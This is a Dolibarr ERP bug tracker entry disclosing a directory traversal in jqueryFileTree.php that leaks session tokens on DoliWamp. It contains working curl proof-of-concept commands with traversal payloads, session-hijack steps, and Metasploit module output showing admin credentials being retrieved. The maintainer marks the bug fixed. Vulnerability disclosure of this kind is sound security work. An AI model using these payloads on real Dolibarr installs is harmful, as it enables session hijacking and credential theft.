Dolibarr ERP & CRM » Bugs » bug #1212 'jqueryFileTree.php' directory traversal vulnerabilityLatest modifications
Answer now
Snapshot| Details |
| Last Modified On: | 2014-01-20 02:22 | | Submitted by: | b (bcoles) |
| Submitted on: | 2014-01-11 19:10 | |
| Summary: | 'jqueryFileTree.php' directory traversal vulnerability |
| Description: | The 'jqueryFileTree.php' file packaged with Dolibarr ERP versions 3.3.0 to 3.4.2 is vulnerable to directory traversal. This may allow session hijacking on DoliWamp on Windows. |
| Step to reproduce bug: | ################################################################################
# Dolibarr ERP version 3.4.2 Directory Traversal #
################################################################################
Dolibarr ERP versions 3.3.0 to 3.4.2 are vulnerable to directory traversal.
The 'jqueryFileTree.php' file is vulnerable to directory traversal and allows
unauthenticated users to list directory contents outside the web document root.
The following proof of concept is available:
curl -i http://dolibarr.example.com/dolibarr/includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php --data "dir=../../../../../../../../"
################################################################################
# DoliWamp version 3.4.2 Session Token Disclosure #
################################################################################
DoliWamp - the Windows packaged installer distribution for Dolibarr ERP - allows
unauthenticated users to view session tokens.
For DoliWamp installations the open_basedir restriction (c:/dolibarr) prevents
the disclosure of directory listings for arbitrary directories outside of the
web document root (c:/dolibarr/htdocs/). However the DoliWamp packaged
installation stores and discloses session tokens in file names within the
base directory (c:/dolibarr/tmp/).
To demonstrate this issue, use directory traversal to list session files:
curl -i http://doliwamp.example.com/dolibarr/includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php --data "dir=../../../../../../../../tmp/"
Extract all session file names from the tmp directory, for example:
sess_ack40ajv2boaudh23mokrpd8o0
Use each token to create a session cookie, by requesting a URL which requires
authentication with the sess_xxx value as a cookie, for example:
curl -i http://doliwamp.example.com/dolibarr/user/fiche.php --cookie "DOLSESSID_anything=ack40ajv2boaudh23mokrpd8o0"
Extract the DOLSESSID cookie from the response, for example:
Set-Cookie: DOLSESSID_74aa8181333680a1ed08f6c33268e639=3so54hmr60nujl6lilf8mms1k1; path=/
If the initial session token is for a valid session then this cookie can be used
to authenticate without providing credentials.
A proof-of-concept Metasploit module is attached. Here's an example of the input:
msf> use auxiliary/gather/doliwamp_traversal_creds
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run
[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[*] 192.168.237.138:80 - Trying to hijack a session - 1.56% done (1/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 3.12% done (2/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 4.69% done (3/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 6.25% done (4/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 7.81% done (5/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 9.38% done (6/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 10.94% done (7/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 12.50% done (8/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 14.06% done (9/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 15.62% done (10/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 17.19% done (11/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 18.75% done (12/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 20.31% done (13/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 21.88% done (14/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 23.44% done (15/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 25.00% done (16/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 26.56% done (17/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 28.12% done (18/64 tokens)
[+] 192.168.237.138:80 - Hijacked session for user with ID '1'
[*] 192.168.237.138:80 - Retrieving user's credentials
[+] 192.168.237.138:80 - Found credentials (admin:admin)
[*] 192.168.237.138:80 - Trying to hijack a session - 29.69% done (19/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 31.25% done (20/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 32.81% done (21/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 34.38% done (22/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 35.94% done (23/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 37.50% done (24/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 39.06% done (25/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 40.62% done (26/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 42.19% done (27/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 43.75% done (28/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 45.31% done (29/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 46.88% done (30/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 48.44% done (31/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 50.00% done (32/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 51.56% done (33/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 53.12% done (34/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 54.69% done (35/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 56.25% done (36/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 57.81% done (37/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 59.38% done (38/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 60.94% done (39/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 62.50% done (40/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 64.06% done (41/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 65.62% done (42/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 67.19% done (43/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 68.75% done (44/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 70.31% done (45/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 71.88% done (46/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 73.44% done (47/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 75.00% done (48/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 76.56% done (49/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 78.12% done (50/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 79.69% done (51/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 81.25% done (52/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 82.81% done (53/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 84.38% done (54/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 85.94% done (55/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 87.50% done (56/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 89.06% done (57/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 90.62% done (58/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 92.19% done (59/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 93.75% done (60/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 95.31% done (61/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 96.88% done (62/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 98.44% done (63/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 100.00% done (64/64 tokens)
Dolibarr User Credentials
=========================
Username Password Admin E-mail
-------- -------- ----- ------
admin admin Yes
[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed
|
| Detected in version: | 3.4.2 | | Category: | Security |
| Severity: | 5 - Major | | OS Type/Version: | Windows |
| PHP version: | | | Database type and version: | |
| Status |
| Status: | Closed | | Assigned to: | Laurent Destailleur (eldy) |
| Resolution: | Fixed | |
Comments- Laurent Destailleur 2014-01-20 02:22
- The bug has been corrected inside GIT sources
(http://www.github.com/Dolibarr/dolibarr).
So fix should be available with next stable release.
|
|
Open→ Closed